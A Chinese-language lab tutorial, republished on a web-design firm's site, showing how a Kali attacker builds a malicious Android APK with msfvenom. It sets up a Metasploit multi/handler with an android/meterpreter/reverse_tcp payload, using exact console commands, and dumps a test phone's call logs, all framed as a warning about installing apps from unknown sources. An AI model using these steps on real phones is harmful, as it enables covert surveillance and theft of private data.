本篇文章為大家展示了如何使用Metasploit對安卓手機(jī)進(jìn)行控制,內(nèi)容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細(xì)介紹希望你能有所收獲。
創(chuàng)新互聯(lián)建站長期為上千客戶提供的網(wǎng)站建設(shè)服務(wù),團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年,關(guān)注不同地域、不同群體,并針對不同對象提供差異化的產(chǎn)品和服務(wù);打造開放共贏平臺(tái),與合作伙伴共同營造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為龍里企業(yè)提供專業(yè)的成都網(wǎng)站設(shè)計(jì)、成都網(wǎng)站建設(shè),龍里網(wǎng)站改版等技術(shù)服務(wù)。擁有10年豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開發(fā)。
如何使用Metasploit對安卓手機(jī)進(jìn)行控制
現(xiàn)在大家每天的生活都離不開一樣?xùn)|西——手機(jī)。手機(jī)上的App給我們的生活帶來了許多歡樂與便利,讓我們足不出戶便能知曉天下事。然而,并不是所有App都是為我們服務(wù)的,有些App可能會(huì)帶著惡意去接近我們。如果你的程序是從官方應(yīng)用商店下載還比較安全,若是從未知來源,如網(wǎng)上論壇,或者他人轉(zhuǎn)發(fā)等“不靠譜”的下載鏈接安裝,那就比較危險(xiǎn)了。所以大部分安卓手機(jī)在你設(shè)置“允許安裝未知來源App”時(shí)都會(huì)彈出如下提醒:
別小看這一道“防護(hù)欄”,他有可能會(huì)替你擋下一波又一波惡意App的進(jìn)攻。也許你可能會(huì)不以為然的關(guān)掉它:我只是裝個(gè)App而已,它又不會(huì)偷我的錢。
下面,我就會(huì)以一個(gè)惡意攻擊者的角度來告訴你,未知來源的App有多危險(xiǎn)!
攻擊機(jī):Kali
靶機(jī)(受害者):FreeBSD安卓4.4.2虛擬機(jī)
首先我們查看并記錄Kali的ip地址:192.168.1.112.
利用Kali下的msfvenom生成惡意APK,也就是安卓程序的安裝包,LHOST為Kali的ip,LPORT可隨意選擇一個(gè)不用的端口。
成功生成一個(gè)apk,我們先把它放著。再啟動(dòng)metasploit的監(jiān)聽器,打開msfconsole控制臺(tái)(吐槽一句,為什么好多Kali下的程序都搞這么花哨的歡迎界面,大佬的世界我不懂)。
打開后,分別輸入:
use exploit/multi/handler
set Payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.112
set LPORT 4444
這樣,就設(shè)置好了攻擊模塊、Payload、接收反彈連接主機(jī)的監(jiān)聽端口等,便可以開始攻擊了。
輸入exploit,等待結(jié)果。
現(xiàn)在,我們開始模仿受害者,通過電子郵件收到了一個(gè)未知來源的apk,名稱為“hh.apk”。
開始安裝,他并沒有提示我“未知來源“,可能是因?yàn)檫@個(gè)安卓版本比較久遠(yuǎn)了,那時(shí)還沒有現(xiàn)在這樣的信息安全保護(hù)意識(shí)吧。
這樣,安裝完成,我們已經(jīng)不知不覺的踏入了“攻擊者“的陷阱中。點(diǎn)擊應(yīng)用程序,發(fā)現(xiàn)并沒有什么響應(yīng)。但其實(shí),我們此時(shí)已經(jīng)被攻擊者掌控住了。
如圖所示,就是受害者已經(jīng)被監(jiān)控的提示,圖中192.168.1.100就是安卓機(jī)的ip地址。
在這個(gè)頁面下,攻擊者基本可以操控手機(jī)的全部功能、竊聽或查看手機(jī)的全部文件。舉個(gè)例子來說,上圖中的“dump_call log“指令就是下載了安卓機(jī)的所有通話記錄,并生成一個(gè)TXT文檔。
這是我模擬手機(jī),撥打三家通信運(yùn)營商的通話記錄,分別是10001、10086和10010。從圖中可以清楚的看到撥打號(hào)碼、通話時(shí)間與撥打接聽方式。當(dāng)然,能做的事遠(yuǎn)不止這些。
上述內(nèi)容就是如何使用Metasploit對安卓手機(jī)進(jìn)行控制,你們學(xué)到知識(shí)或技能了嗎?如果還想學(xué)到更多技能或者豐富自己的知識(shí)儲(chǔ)備,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。
本文題目:如何使用Metasploit對安卓手機(jī)進(jìn)行控制
當(dāng)前URL:http://aaarwkj.com/article24/jejcje.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供服務(wù)器托管、用戶體驗(yàn)、Google、移動(dòng)網(wǎng)站建設(shè)、電子商務(wù)、響應(yīng)式網(wǎng)站
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)